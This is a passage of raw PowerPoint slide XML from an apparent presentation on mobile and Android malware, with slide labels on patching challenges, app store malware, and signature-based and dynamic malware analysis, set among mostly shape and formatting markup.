                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="368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230" name="Hexagon 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4002653" y="1902672"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="TextBox 230"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4106285" y="2204123"/>
            <a:ext cx="1295400" cy="69249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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>app-level </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Hexagon 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3305740" y="3174260"/>
            <a:ext cx="1499489" cy="1295400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1502664 w 1502664"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY6" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1499489 w 1499489"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY6" fmla="*/ 64770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99489" h="1295400">
                <a:moveTo>
                  <a:pt x="0" y="647700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="320675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499489" y="647700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320675" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6477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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="TextBox 232"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3407785" y="3591127"/>
            <a:ext cx="1295400" cy="46166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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Patching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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34" name="Hexagon 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4002653" y="4442672"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="TextBox 234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4106285" y="4859539"/>
            <a:ext cx="1295400" cy="46166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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Never-ending</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Hexagon 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4701153" y="3172672"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="TextBox 236"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804785" y="3698884"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Hexagon 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2605653" y="4442672"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="TextBox 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2709285" y="4967262"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lat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133922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0" grpId="0" animBg="1"/>
      <p:bldP spid="231" grpId="0"/>
      <p:bldP spid="232" grpId="0" animBg="1"/>
      <p:bldP spid="233" grpId="0"/>
      <p:bldP spid="234" grpId="0" animBg="1"/>
      <p:bldP spid="235" grpId="0"/>
      <p:bldP spid="236" grpId="0" animBg="1"/>
      <p:bldP spid="23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Mobile Malware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711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Evolution of Android Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548899" y="3630389"/>
            <a:ext cx="3501164" cy="1095547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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Google introduces technologies such as “Bouncer” and “Verify Apps”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386179" y="2571537"/>
            <a:ext cx="1848083" cy="1095547"/>
            <a:chOff x="386179" y="2575075"/>
            <a:chExt cx="1848083" cy="1095547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="386179" y="2575075"/>
              <a:ext cx="1848082" cy="1095547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defTabSz="533400"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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Google Play is riddled with malware</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri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581619" y="3178179"/>
              <a:ext cx="6526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2011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7035261" y="2571537"/>
            <a:ext cx="1848083" cy="1095547"/>
            <a:chOff x="7035261" y="2575075"/>
            <a:chExt cx="1848083" cy="1095547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7035261" y="2575075"/>
              <a:ext cx="1848082" cy="1095547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defTabSz="533400"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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>3rd party stores are riddled with malware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230701" y="3178179"/>
              <a:ext cx="6526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2015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" name="Right Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2330512" y="2571537"/>
            <a:ext cx="4608499" cy="1095547"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst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  <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri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5260" y="3708649"/>
            <a:ext cx="1966582" cy="164838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3540" y="3834181"/>
            <a:ext cx="1560787" cy="359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919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Malware Analysis Techniques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391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Signature-Based Analysis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3919" y="1899840"/>
            <a:ext cx="5575300" cy="3569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325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nt-Up Arrow 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1483733" y="4135420"/>
            <a:ext cx="849730" cy="1979376"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 3589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9123" y="3699079"/>
            <a:ext cx="5843306" cy="1893231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13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585200" y="6308725"/>
            <a:ext cx="406400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E93C9998-D43C-414D-B668-2ADDEF99A61C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Dynamic Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583863" y="1313334"/>
            <a:ext cx="2198318" cy="366386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rapezoid 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="899865" y="1295487"/>
            <a:ext cx="1566316" cy="1686284"/>
          </a:xfrm>
          <a:prstGeom prst="trapezoid">
            <a:avLst>
              <a:gd name="adj" fmla="val 23881"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="59000">
                <a:schemeClr val="bg1">
                  <a:alpha val="74000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="41000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="74000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="39000">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="67000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="61000">
                <a:schemeClr val="bg1">
                  <a:alpha val="67000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="92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  <a:effectLst>
            <a:softEdge rad="139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elay 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1049211" y="2969987"/>
            <a:ext cx="1267622" cy="825036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
              <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
              <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
              <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
              <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825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67622" h="825036">
                <a:moveTo>
                  <a:pt x="72605" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="496576" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="730729" y="0"/>
                  <a:pt x="1267622" y="184691"/>
                  <a:pt x="1267622" y="412518"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1267622" y="640345"/>
                  <a:pt x="730729" y="825036"/>
                  <a:pt x="496576" y="825036"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72605" y="825035"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-20837" y="550023"/>
                  <a:pt x="-27511" y="248315"/>
                  <a:pt x="72605" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="42000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="59000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="508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989747" y="1348266"/>
            <a:ext cx="1386550" cy="1506594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74000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
            <a:tileRect/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elay 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1053520" y="3152622"/>
            <a:ext cx="1259004" cy="451151"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
              <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
              <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
              <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
              <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
